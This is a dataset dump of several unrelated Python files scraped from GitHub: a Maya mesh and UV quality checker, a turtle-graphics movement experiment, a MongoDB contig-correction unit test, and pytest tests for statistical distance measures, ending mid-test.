response.xpath(\".//table[@id='at']/tr[3]/td[3]/text()\").extract_first().strip()\n# novel_Allcomm = response.xpath(\".//table[@id='at']/tr[4]/td[1]/text()\").extract_first().strip()\n# novel_Moncomm = response.xpath(\".//table[@id='at']/tr[4]/td[2]/text()\").extract_first().strip()\n# novel_Weekcomm = response.xpath(\".//table[@id='at']/tr[4]/td[3]/text()\").extract_first().strip()\n# pattern = re.compile(r'

(.*?)\r\n\r\nThis program is free software: you can redistribute it and/or modify it under \r\nthe terms of the GNU General Public License as published by the Free Software \r\nFoundation, either version 3 of the License, or (at your option) any later \r\nversion.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY \r\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A \r\nPARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with \r\nthis program. If not, see .\r\n\"\"\"\r\n\r\nimport maya.api.OpenMaya as om # Maya Python API 2.0\r\nimport maya.cmds as cmds\r\nimport sys\r\nfrom tlc.common.conditionchecker import ConditionChecker\r\nfrom tlc.common.conditionchecker import ConditionErrorLevel\r\nfrom tlc.common.conditionchecker import ConditionErrorCriteria\r\n\r\ndef getTileID(u, v):\r\n \"\"\"Build tile ID string for a texture coordinates pair (u,v)\r\n\r\n Args:\r\n u (float): Tile U\r\n v (float): Tile V\r\n\r\n Returns:\r\n str: Tile ID\r\n \"\"\"\r\n tu = int(u)\r\n tv = int(v)\r\n return \"%d,%d\"%(tu, tv) \r\n\r\n\r\ndef checkUVTile(u, v, the_set):\r\n \"\"\"Check the UV tile for a pair of texture coordinates (u,v) and add it to the set of checked tiles\r\n\r\n Args:\r\n u (float): Tile U\r\n v (float): Tile V\r\n the_set (set): Set of so-far checked tiles\r\n \"\"\"\r\n tile_id = getTileID(u, v)\r\n the_set.add(tile_id)\r\n\r\n\r\nclass MeshChecker():\r\n \"\"\"Class MeshChecker\r\n\r\n Statistics of a mesh\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"Constructor\r\n \"\"\"\r\n\r\n self.selection = []\r\n \"\"\"Original selection to be analized\r\n \"\"\"\r\n\r\n self.bbox = [ sys.float_info.max, sys.float_info.max, sys.float_info.max, -sys.float_info.max, -sys.float_info.max, -sys.float_info.max ]\r\n \"\"\"Global world-space bounding box for the selection [xmin, ymin, zmin, xmax, ymax, zmax]\r\n \"\"\"\r\n\r\n self.geoConditions = dict()\r\n \"\"\"Dictionary/map of geometry condition checkers (using name as key)\r\n \"\"\"\r\n\r\n self.uvConditions = dict()\r\n \"\"\"Dictionary/map of UV condition checkers (using name as key)\r\n \"\"\"\r\n\r\n self.geoConditions[\"meshes\"] = ConditionChecker(\"meshes\", \"Meshes\", \"Number of meshes in selected elements\", False)\r\n #self.addGeoCondition(\"history\")\r\n\r\n # Poly evaluate\r\n self.geoConditions[\"shells\"] = ConditionChecker(\"shells\", \"Shells\", \"Number of shells in selected elements\", False)\r\n self.geoConditions[\"vertices\"] = ConditionChecker(\"vertices\", \"Vertices\", \"Number of vertices in selected elements\", False)\r\n self.geoConditions[\"edges\"] = ConditionChecker(\"edges\", \"Edges\", \"Number of edges in selected elements\", False)\r\n self.geoConditions[\"faces\"] = ConditionChecker(\"faces\", \"Faces\", \"Number of faces/polygons in selected elements\", False)\r\n self.geoConditions[\"area\"] = ConditionChecker(\"area\")\r\n\r\n # Face checks\r\n self.geoConditions[\"quads\"] = ConditionChecker(\"quads\", \"Quads\", \"Number of quads in selected elements\")\r\n self.geoConditions[\"tris\"] = ConditionChecker(\"tris\", \"Tris\", \"Number of triangles in selected elements\")\r\n self.geoConditions[\"ngons\"] = ConditionChecker(\"ngons\", \"n-Gons\", \"Number of n-gons in selected elements\")\r\n # Degenerated faces (only quads)\r\n self.geoConditions[\"quadsToTris\"] = ConditionChecker(\"quadsToTris\", \"Quads to tris\", \"Number of quads degenerated to triangles (two vertices in the same position)\") # Two vertices in the same position\r\n self.geoConditions[\"quadsToLines\"] = ConditionChecker(\"quadsToLines\", \"Quads to lines\", \"Number of quads degenerated to lines (vertices in two different positions)\") # 2+2 or 3+1 vertices grouped\r\n self.geoConditions[\"quadsToPoints\"] = ConditionChecker(\"quadsToPoints\", \"Quads to points\", \"Number of quads degenerated to points (all vertices in the same position)\") # All four vertices in the same position\r\n self.geoConditions[\"zeroAreaQuads\"] = ConditionChecker(\"zeroAreaQuads\", \"Zero area quads\", \"Zero area quads\") # More than two vertices in the same position\r\n \r\n # Edge checks\r\n self.geoConditions[\"borderEdges\"] = ConditionChecker(\"borderEdges\", \"Border edges\", \"Number of border edges in selected elements\") # Border edges (only one face uses this edge)\r\n self.geoConditions[\"evilEdges\"] = ConditionChecker(\"evilEdges\", \"Evil edges\", \"Number of edges sharing more than two faces. Non-manifold geometry\") # Edges connecting more than 2 faces\r\n \r\n # Vertex checks\r\n self.geoConditions[\"poles\"] = ConditionChecker(\"poles\", \"Poles\", \"Number of poles in selected elements (vertices connecting a number of edges other than 4)\")\r\n\r\n # UVs\r\n self.uvConditions[\"uvSets\"] = ConditionChecker(\"uvSets\", \"UV sets\", \"Number of UV sets in selected elements\", False) # Number of UV sets\r\n self.uvConditions[\"uvShells\"] = ConditionChecker(\"uvShells\", \"UV shells\", \"Number of UV shells in selected elements\", False) # Number of UV shells\r\n self.uvConditions[\"uvMissing\"] = ConditionChecker(\"uvMissing\", \"UV missing\", \"Number of face vertices missing UV coordinates\") # Faces with no UVs\r\n self.uvConditions[\"uvFlipped\"] = ConditionChecker(\"uvFlipped\", \"UV flipped\", \"Number of faces flipped in UV space\") # Faces flipped in UV\r\n self.uvConditions[\"uvZeroArea\"] = ConditionChecker(\"uvZeroArea\", \"UV zero area\", \"Number of faces occupying zero (or near zero) area in UV space\") # Faces with zero area in UV space\r\n self.uvConditions[\"uvOverlapping\"] = ConditionChecker(\"uvOverlapping\", \"UV overlaps\", \"Number of faces overlapped in UV space\") # Overlapping faces\r\n self.uvConditions[\"uvCrossingBorders\"] = ConditionChecker(\"uvCrossingBorders\", \"UV crossing borders\", \"Number of faces crossing borders of a tile\") # Faces crossing tile (UDIM) borders\r\n self.uvConditions[\"uvCoverage\"] = ConditionChecker(\"uvCoverage\", \"UV coverage\", \"Normalized UV coverage of selected elements\", False) # UV coverage (normalized to the space of tiles/UDIMs used)\r\n # Normalized Texeld Density (NTD)\r\n self.uvConditions[\"avgNTD\"] = ConditionChecker(\"avgNTD\", \"Avg. NTD\", \"Average normalized texel density\", False) # Average NTD\r\n self.uvConditions[\"minNTD\"] = ConditionChecker(\"minNTD\", \"Min. NTD\", \"Minimum normalized texel density\", False) # Minimum NTD\r\n self.uvConditions[\"maxNTD\"] = ConditionChecker(\"maxNTD\", \"Max. NTD\", \"Maximum normalized texel density\", False) # Maximum NTD\r\n self.uvConditions[\"varianceNTD\"] = ConditionChecker(\"varianceNTD\", \"Var. NTD\", \"Variance normalized texel density\", False) # Variance of NTD distribution\r\n self.uvConditions[\"stdDevNTD\"] = ConditionChecker(\"stdDevNTD\", \"Stdev. NTD\", \"Standard deviation normalized texel density\", False) # Standard deviation of NTD distribution\r\n\r\n #self.reset()\r\n \r\n\r\n def reset(self):\r\n \"\"\"Initialize object with default values (reset counters)\r\n \"\"\"\r\n for cond in self.geoConditions:\r\n self.geoConditions[cond].reset()\r\n\r\n for cond in self.uvConditions:\r\n self.uvConditions[cond].reset()\r\n\r\n self.selection = []\r\n\r\n # Global world-space bounding box\r\n self.bbox = [ sys.float_info.max, sys.float_info.max, sys.float_info.max, -sys.float_info.max, -sys.float_info.max, -sys.float_info.max ] # xmin, ymin, zmin, xmax, ymax, zmax\r\n\r\n\r\n # Helper functions for off-line usage\r\n\r\n def writeHeaderCSV(self, file):\r\n \"\"\"Write the CSV header for meshcheck data\r\n\r\n NOTE: This function does not write end-of-line because some data may be concatenated later. End-of-line is responsibility of the caller\r\n\r\n Args:\r\n file (file): CSV file object to write into. The file must have been opened\r\n \"\"\"\r\n header = \"\"\r\n # Add conditions\r\n for c in self.geoConditions:\r\n if header == \"\":\r\n header += \",\"\r\n header += c.name\r\n for c in self.uvConditions:\r\n if header == \"\":\r\n header += \",\"\r\n header += c.name\r\n #header += \",\"+str(len(self.uvTileSet)) # Tiles used (occupied)\r\n # Add bounding box information\r\n header += \",minY,centerX,centerZ\"\r\n file.write(header)\r\n\r\n\r\n def writeDataCSV(self, file):\r\n \"\"\"Write the CSV data for meshcheck data\r\n\r\n NOTE: This function does not write end-of-line because some data may be concatenated later. End-of-line is responsibility of the caller\r\n\r\n Args:\r\n file (_type_): _description_\r\n \"\"\"\r\n data_line = \"\"\r\n # Conditions\r\n for c in self.geoConditions:\r\n if data_line == \"\":\r\n data_line += \",\"\r\n data_line += c.count\r\n for c in self.uvConditions:\r\n if data_line == \"\":\r\n data_line += \",\"\r\n data_line += c.count\r\n #file.write(\",\"+str(len(self.uvTileSet))) # Tiles used\r\n # Bounding box\r\n data_line += \",\"+str(self.bbox[1])\r\n data_line += \",\"+str((self.bbox[0] + self.bbox[3]) / 2.)\r\n data_line += \",\"+str((self.bbox[2] + self.bbox[5]) / 2.)\r\n file.write(data_line)\r\n\r\n def analyze(self):\r\n \"\"\"Analyze the selected objects\r\n \"\"\"\r\n self.reset()\r\n\r\n # Save original selection (just in case we want to restore it)\r\n self.selection = om.MGlobal.getActiveSelectionList() # MSelectionList\r\n\r\n # Fix selection. Select children instead of groups...\r\n selected_nodes = cmds.ls(selection=True)\r\n selected_shapes = cmds.listRelatives(selected_nodes, allDescendents=True, type=\"mesh\", fullPath=True)\r\n\r\n if not selected_shapes:\r\n # Nothing to analyze. We're done here\r\n return\r\n\r\n # Select shapes from original selection\r\n cmds.select(selected_shapes, replace=True)\r\n\r\n # Polygon statistics\r\n poly_eval = cmds.polyEvaluate(vertex=True, edge=True, face=True, triangle=True, area=True, worldArea=True, shell=True)\r\n self.geoConditions[\"shells\"].count = poly_eval[\"shell\"]\r\n self.geoConditions[\"vertices\"].count = poly_eval[\"vertex\"]\r\n self.geoConditions[\"edges\"].count = poly_eval[\"edge\"]\r\n self.geoConditions[\"faces\"].count = poly_eval[\"face\"]\r\n\r\n #print(\"POLY EVAL: \", poly_eval)\r\n\r\n for s in selected_shapes:\r\n #stats.history += historySize(s)\r\n\r\n # Grow the collective BB by adding the BB of each element\r\n bbox = cmds.exactWorldBoundingBox(s)\r\n for bi in range(0,3):\r\n if bbox[bi] < self.bbox[bi]:\r\n self.bbox[bi] = bbox[bi]\r\n for bi in range(3,6):\r\n if bbox[bi] > self.bbox[bi]:\r\n self.bbox[bi] = bbox[bi]\r\n\r\n # TO-DO: copy checkers implementation from mayaptools\r\n # Iterate over selected elements\r\n sel = om.MGlobal.getActiveSelectionList() # MSelectionList\r\n\r\n if not sel.length():\r\n om.MGlobal.displayError(\"No selection.\")\r\n return\r\n\r\n # Clear the selection (the analyzers will add offending components to selection)\r\n cmds.select(clear=True)\r\n\r\n print(\"Selected \", sel.length(), \" elements\")\r\n for i in range(0, sel.length()):\r\n # OpenMaya API 2.0\r\n dag = sel.getDagPath(i)\r\n selected_components = sel.getComponent(i)\r\n dag.extendToShape()\r\n\r\n self.__analyzeFaces(dag, selected_components)\r\n\r\n self.__analyzeVertices(dag, selected_components)\r\n\r\n self.__analyzeEdges(dag, selected_components)\r\n\r\n # Restore original selection\r\n om.MGlobal.setActiveSelectionList(self.selection)\r\n\r\n\r\n def __analyzeFaces(self, dag, selected_components):\r\n\r\n if dag.apiType() != om.MFn.kMesh:\r\n om.MGlobal.displayError(\"Selection must be a polygon mesh.\")\r\n return\r\n\r\n # MFnMesh interface\r\n mesh = om.MFnMesh(dag)\r\n\r\n # Report as number of UV sets the maximum number in any mesh\r\n self.uvConditions[\"uvSets\"].count = max(self.uvConditions[\"uvSets\"].count, mesh.numUVSets)\r\n\r\n uv_shell_ids = mesh.getUvShellsIds()\r\n # First field in the array is the number of UV shells\r\n self.uvConditions[\"uvShells\"].count += uv_shell_ids[0]\r\n\r\n # Check UVs\r\n faces = cmds.polyListComponentConversion(dag.getPath(), toFace=True)\r\n\r\n # Overlapping UVs\r\n overlapping_uvs = cmds.polyUVOverlap(faces, oc=True)\r\n if overlapping_uvs:\r\n self.uvConditions[\"uvOverlapping\"].count += len(overlapping_uvs)\r\n # Add overlapping faces to the bad_faces list\r\n for f in overlapping_uvs:\r\n self.uvConditions[\"uvOverlapping\"].elms.append(f)\r\n else:\r\n self.uvConditions[\"uvOverlapping\"].count = 0\r\n\r\n if self.uvConditions[\"uvOverlapping\"].count > 0:\r\n self.uvConditions[\"uvOverlapping\"].errorLevel = ConditionErrorLevel.ERROR\r\n else:\r\n self.uvConditions[\"uvOverlapping\"].errorLevel = ConditionErrorLevel.OK\r\n\r\n # iterate over the selected faces\r\n itFaces = om.MItMeshPolygon(dag, selected_components[1])\r\n\r\n ntd_array = []\r\n while not itFaces.isDone():\r\n\r\n # UVs stuff (EXPERIMENTAL)\r\n if not itFaces.hasUVs() :\r\n self.uvConditions[\"uvMissing\"].count += 1\r\n self.uvConditions[\"uvMissing\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n else:\r\n if mesh.isPolygonUVReversed(itFaces.index()):\r\n self.uvConditions[\"uvFlipped\"].count += 1\r\n self.uvConditions[\"uvFlipped\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n if itFaces.zeroUVArea() :\r\n # This method is too conservative. Tiny faces are reported as zero area. We'll define our own criteria in min_uv_area\r\n min_uv_area = 1e-8\r\n if itFaces.getUVArea() < min_uv_area:\r\n self.uvConditions[\"uvZeroArea\"].count += 1\r\n self.uvConditions[\"uvZeroArea\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n elif itFaces.zeroArea():\r\n pass # This avoids division by zero in the code below (else) because ws_area is zero in this case\r\n else:\r\n self.uvConditions[\"uvCoverage\"].count += itFaces.getUVArea()\r\n ws_area = itFaces.getArea(om.MSpace.kWorld)\r\n ts_area = itFaces.getUVArea()\r\n if ws_area != 0:\r\n ntd = ts_area / ws_area # Normalized texel density (texture size in world space)\r\n else:\r\n ntd = 0.\r\n ntd_array.append( ntd )\r\n\r\n uvs = itFaces.getUVs()\r\n if uvs:\r\n the_set = set()\r\n for i in range(len(uvs[0])):\r\n checkUVTile( uvs[0][i], uvs[1][i], the_set )\r\n if len(the_set) > 1:\r\n self.uvConditions[\"uvCrossingBorders\"].count += 1\r\n self.uvConditions[\"uvCrossingBorders\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n\r\n # Get points array for this face\r\n point_array = itFaces.getPoints() # MPointArray\r\n vertices_in_face = len(point_array)\r\n # Check vertices in the same position (quads only)\r\n if len(point_array) == 4:\r\n point_set = set() # Empty set\r\n for i in range(0, len(point_array)):\r\n # We accumulate vertex coordinates in a set to automatically remove duplicates\r\n point_coords = ( point_array[i].x, point_array[i].y, point_array[i].z )\r\n point_set.add( point_coords )\r\n\r\n if len(point_set) < 4:\r\n if len(point_set) == 1:\r\n self.geoConditions[\"quadsToPoints\"].count += 1\r\n self.geoConditions[\"quadsToPoints\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n self.geoConditions[\"zeroAreaQuads\"].count += 1\r\n self.geoConditions[\"zeroAreaQuads\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n elif len(point_set) == 2:\r\n self.geoConditions[\"quadsToLines\"].count += 1\r\n self.geoConditions[\"quadsToLines\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n self.geoConditions[\"zeroAreaQuads\"].count += 1\r\n self.geoConditions[\"zeroAreaQuads\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n else: # 3 different points\r\n self.geoConditions[\"quadsToTris\"].count += 1\r\n self.geoConditions[\"quadsToTris\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n\r\n edge_array = itFaces.getEdges() # MIntArray\r\n edges_in_face = len(edge_array)\r\n\r\n if edges_in_face == 3:\r\n self.geoConditions[\"tris\"].count += 1\r\n self.geoConditions[\"tris\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n elif edges_in_face == 4:\r\n self.geoConditions[\"quads\"].count += 1\r\n self.geoConditions[\"quads\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n else:\r\n self.geoConditions[\"ngons\"].count += 1\r\n self.geoConditions[\"ngons\"].elms.append(dag.fullPathName()+\".f[\"+str(itFaces.index())+\"]\")\r\n\r\n itFaces.next()\r\n\r\n # Set error levels\r\n self.geoConditions[\"tris\"].setErrorLevel(ConditionErrorCriteria.WARN_WHEN_NOT_ZERO)\r\n self.geoConditions[\"ngons\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"quadsToPoints\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"quadsToLines\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"quadsToTris\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.geoConditions[\"zeroAreaQuads\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvOverlapping\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvMissing\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvFlipped\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvZeroArea\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n self.uvConditions[\"uvCrossingBorders\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n if self.uvConditions[\"uvCoverage\"].count < .25:\r\n self.uvConditions[\"uvCoverage\"].errorLevel = ConditionErrorLevel.ERROR\r\n elif self.uvConditions[\"uvCoverage\"].count < .25:\r\n self.uvConditions[\"uvCoverage\"].errorLevel = ConditionErrorLevel.WARN\r\n else:\r\n self.uvConditions[\"uvCoverage\"].errorLevel = ConditionErrorLevel.OK\r\n\r\n # Compute texel density statistics\r\n if ( len(ntd_array) ):\r\n self.uvConditions[\"avgNTD\"].count = sum(ntd_array) / len(ntd_array)\r\n self.uvConditions[\"minNTD\"].count = min(ntd_array)\r\n self.uvConditions[\"maxNTD\"].count = max(ntd_array)\r\n self.uvConditions[\"varianceNTD\"].count = sum((x-self.uvConditions[\"avgNTD\"].count)**2 for x in ntd_array) / len(ntd_array)\r\n self.uvConditions[\"stdDevNTD\"].count = self.uvConditions[\"varianceNTD\"].count**0.5\r\n\r\n\r\n def __analyzeVertices(self, dag, selected_components):\r\n\r\n cmds.select(cmds.polyListComponentConversion(toVertex=True))\r\n\r\n if dag.apiType() != om.MFn.kMesh:\r\n om.MGlobal.displayError(\"Selection must be a polygon mesh.\")\r\n return\r\n\r\n # iterate over the selected verts\r\n itVerts = om.MItMeshVertex(dag, selected_components[1])\r\n\r\n while not itVerts.isDone():\r\n valence = itVerts.numConnectedEdges()\r\n\r\n if valence != 4:\r\n self.geoConditions[\"poles\"].count += 1\r\n self.geoConditions[\"poles\"].elms.append(dag.fullPathName()+\".vtx[\"+str(itVerts.index())+\"]\")\r\n\r\n itVerts.next()\r\n\r\n # Set error levels\r\n self.geoConditions[\"poles\"].setErrorLevel(ConditionErrorCriteria.WARN_WHEN_NOT_ZERO)\r\n\r\n\r\n def __analyzeEdges(self, dag, selected_components):\r\n\r\n if dag.apiType() != om.MFn.kMesh:\r\n om.MGlobal.displayError(\"Selection must be a polygon mesh.\")\r\n return\r\n\r\n # iterate over the selected edges\r\n itEdges = om.MItMeshEdge(dag, selected_components[1])\r\n\r\n while not itEdges.isDone():\r\n \r\n num_faces = itEdges.numConnectedFaces()\r\n \r\n if ( num_faces == 1 ):\r\n self.geoConditions[\"borderEdges\"].count += 1\r\n self.geoConditions[\"borderEdges\"].elms.append(dag.fullPathName()+\".e[\"+str(itEdges.index())+\"]\")\r\n elif ( num_faces > 2 ):\r\n self.geoConditions[\"evilEdges\"].count += 1\r\n self.geoConditions[\"evilEdges\"].elms.append(dag.fullPathName()+\".e[\"+str(itEdges.index())+\"]\")\r\n \r\n itEdges.next()\r\n\r\n # Set error levels\r\n self.geoConditions[\"borderEdges\"].setErrorLevel(ConditionErrorCriteria.WARN_WHEN_NOT_ZERO)\r\n self.geoConditions[\"evilEdges\"].setErrorLevel(ConditionErrorCriteria.ERROR_WHEN_NOT_ZERO)\r\n","repo_name":"jtaibo/TallerCreacionTools","sub_path":"maya/python/tlc/modeling/meshcheck.py","file_name":"meshcheck.py","file_ext":"py","file_size_in_byte":22495,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"2510406370","text":"import turtle\n# Movement experiment\n\nscreen = turtle.Screen()\nscreen.setup(width=500,height=400)\nscreen.bgcolor(\"white\")\n\n\nb = turtle.Turtle()\nb.shape(\"circle\")\nb.dx = 0.1\nb.dy = -0.1\nt = 1\nwhile True:\n t += 1\n b.sety((b.ycor()+(b.dy*t))/2)\n b.setx(b.xcor()+(b.dx*t)/2)\n print (t)\nturtle.done()\n","repo_name":"bermudez05/Ping-pong-Game","sub_path":"Movement experiment (accelerate).py","file_name":"Movement experiment (accelerate).py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34869651076","text":"from unittest import TestCase\n\nfrom ebi_eva_common_pyutils.mongodb import MongoDatabase\n\nfrom tasks.eva_2155.correct_contig_error_in_study import correct\nimport logging\n\n\nclass TestCorrectContigErrorInStudy(TestCase):\n def setUp(self) -> None:\n self.contig = \"AF010406.1\"\n self.db = \"eva_accession_sharded_test\"\n self.collection = \"submittedVariantEntity\"\n self.uri = \"mongodb://localhost:27017/\"\n self.mongo_source = MongoDatabase(uri=self.uri, db_name=self.db)\n wrong_contig = [{\n \"_id\": \"8C4E490E82B895ADE3B9405204771B9E6BDCB286\",\n \"seq\": \"GCA_000298735.1\",\n \"tax\": 9940,\n \"study\": \"PRJEB33693\",\n \"contig\": \"-\",\n \"start\": 16410,\n \"ref\": \"G\",\n \"alt\": \"A\",\n \"accession\": 7121896076,\n \"version\": 1,\n \"createdDate\": \"2020-05-05T10:38:43.367Z\"\n },\n {\n \"_id\": \"7350E3A0B0242791BD25901F15D22467DC7939BD\",\n \"seq\": \"GCA_000298735.1\",\n \"tax\": 9940,\n \"study\": \"PRJEB33693\",\n \"contig\": \"OARMT\",\n \"start\": 16410,\n \"ref\": \"G\",\n \"alt\": \"A\",\n \"accession\": 7121824383,\n \"version\": 1,\n \"createdDate\": \"2020-04-28T00:26:01.844Z\"\n },\n {\n \"_id\": \"C9618202A2AF568A94259A1A16AB0A67DCC1CC94\",\n \"seq\": \"GCA_000298735.1\",\n \"tax\": 9940,\n \"study\": \"PRJEB23437\",\n \"contig\": \"CM001582.1\",\n \"start\": 5442343,\n \"ref\": \"C\",\n \"alt\": \"T\",\n \"accession\": 5264373293,\n \"version\": 1,\n \"createdDate\": \"2019-07-07T11:14:13.110Z\"\n }\n\n ]\n\n self.mongo_source.mongo_handle[self.db][self.collection].drop()\n self.mongo_source.mongo_handle[self.db][self.collection].insert_many(wrong_contig)\n\n def tearDown(self) -> None:\n self.mongo_source.mongo_handle[self.db][self.collection].drop()\n self.mongo_source.mongo_handle.close()\n\n def test_correct(self):\n fixed = correct(self.mongo_source)\n self.assertEqual(fixed, (1, 1))\n updated_variant = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'seq': 'GCA_000298735.1', 'accession': 7121896076}))\n self.assertEqual(updated_variant['contig'], self.contig)\n self.assertEqual(updated_variant['_id'], '2FE89DBEFF0FB8CB4A544070042101916C9BA0A4')\n \n variant_with_hyphen = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'_id': '8C4E490E82B895ADE3B9405204771B9E6BDCB286'}))\n self.assertIsNone(variant_with_hyphen)\n \n variant_with_OARMT = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'_id': '7350E3A0B0242791BD25901F15D22467DC7939BD'}))\n self.assertIsNone(variant_with_OARMT)\n \n variant_to_keep = (self.mongo_source.mongo_handle[self.db][self.collection].find_one(\n {'_id': 'C9618202A2AF568A94259A1A16AB0A67DCC1CC94'}))\n self.assertIsNotNone(variant_to_keep)\n\n self.assertEqual(self.mongo_source.mongo_handle[self.db][self.collection].count(), 2)\n","repo_name":"EBIvariation/eva-tasks","sub_path":"tasks/eva_2155/test/test_correct_contig_error.py","file_name":"test_correct_contig_error.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26025493354","text":"import pytest\nimport numpy as np\nimport quafing\nfrom scipy.stats import norm\n\n#Test Dimensionality other than 1d and nd\ndef test_wrong_dims_kl(): \n with pytest.raises(RuntimeError):\n quafing.distance.kl_divergence_distance._choose_sym_kl_div_func(dim='3d')\n\ndef test_wrong_dims_cos(): \n with pytest.raises(RuntimeError):\n quafing.distance.cosine_distance._choose_cosine_func(dim='3d')\n\ndef test_wrong_dims_hd(): \n with pytest.raises(RuntimeError):\n quafing.distance.hellinger_distance._choose_hellinger_func(dim='3d')\n\n#Test nd \"NotImplementedError\" until implemented - TO BE CHANGED AFTER IMPLEMENTATION\ndef test_sym_kl_div_nd():\n with pytest.raises(NotImplementedError):\n quafing.distance.kl_divergence_distance.sym_kl_div_nd()\n\ndef test_cosine_nd():\n with pytest.raises(NotImplementedError):\n quafing.distance.cosine_distance.cosine_nd(is_discrete=True)\n with pytest.raises(NotImplementedError):\n quafing.distance.cosine_distance.cosine_nd(is_discrete=False)\n\ndef test_hellinger_nd():\n with pytest.raises(NotImplementedError):\n quafing.distance.hellinger_distance.hellinger_nd(is_discrete=True)\n with pytest.raises(NotImplementedError):\n quafing.distance.hellinger_distance.hellinger_nd(is_discrete=False)\n\n#Test discrete calculations in 1d\ndef test_discrete_kl_div_1d_isinf_with_2nd_smaller_pdf():\n with pytest.warns(RuntimeWarning):\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7}\n assert np.isposinf(quafing.distance.kl_divergence_distance.sym_kl_div_1d(p1, p2, is_discrete=True))\n\ndef test_discrete_kl_zero_if_equal():\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 3: 0.7}\n assert np.isclose(quafing.distance.kl_divergence_distance.sym_kl_div_1d(p1, p2, is_discrete=True),0.)\n\ndef test_discrete_cosine_1d():\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 3: 0.7}\n assert np.isclose(quafing.distance.cosine_distance.cosine_1d(p1, p2, is_discrete=True), 0.)\n\ndef test_discrete_hellinger_1d_is_zero_ifequal():\n p1 = {1: 0.2, 2: 0.1, 3: 0.7}\n p2 = {1: 0.2, 2: 0.1, 3: 0.7}\n assert np.isclose(quafing.distance.hellinger_distance.hellinger_1d(p1, p2, is_discrete=True), 0.)\n\ndef test_discrete_hellinger_is_symmetric():\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7}\n assert np.isclose(quafing.distance.hellinger_distance.hellinger_1d(p1, p2, is_discrete=True), quafing.distance.hellinger_distance.hellinger_1d(p2, p1, is_discrete=True))\n\n#Test continuous distance calculation in 1D\ndef test_continuous_kl_converges_to_analytic_result():\n s1 = 1.0\n s2 = 2.0\n m1 = 1\n m2 = 1\n p1 = norm.freeze(loc=m1, scale=s1).pdf\n p2 = norm.freeze(loc=m2, scale=s2).pdf\n kl_dist = quafing.distance.kl_divergence_distance.continuous_kl_div_1d(p1, p2, base=None)\n analytic = np.log(s2/s1) + (s1**2 + (m1-m2)**2) / (2 * s2**2) - 0.5\n # On my machine relative error around 1e-16\n assert np.isclose(kl_dist, analytic)\n\ndef test_continuous_hellinger_converges_to_analytic_result():\n s1 = 1.0\n s2 = 2.0\n m1 = 1\n m2 = 1\n p1 = norm.freeze(loc=m1, scale=s1).pdf\n p2 = norm.freeze(loc=m2, scale=s2).pdf\n hell_dist = quafing.distance.hellinger_distance.continuous_hellinger_1d(p1, p2)\n analytic = (1 - np.sqrt((2*s1*s2)/(s1**2+s2**2)) * np.exp(-0.25*((m1-m2)**2)/(s1**2+s2**2)))\n analytic = np.sqrt(2 * analytic)\n # On my machine relative error around 1e-16\n assert np.isclose(hell_dist, analytic)\n\ndef test_get_ID_measure():\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7} \n with pytest.raises(RuntimeError, match=r'specification of information distance measure required'):\n quafing.distance.information_distance.information_distance(p1,p2,method=None)\n with pytest.raises(RuntimeError, match=r'specifiation of piecewise distance aggregation function required'):\n quafing.distance.information_distance.information_distance(p1,p2,method='kl',pwdist=None)\n\ndef test_check_distance_measure_method():\n with pytest.raises(NotImplementedError):\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = {1: 0.2, 2: 0.1, 4: 0.7}\n 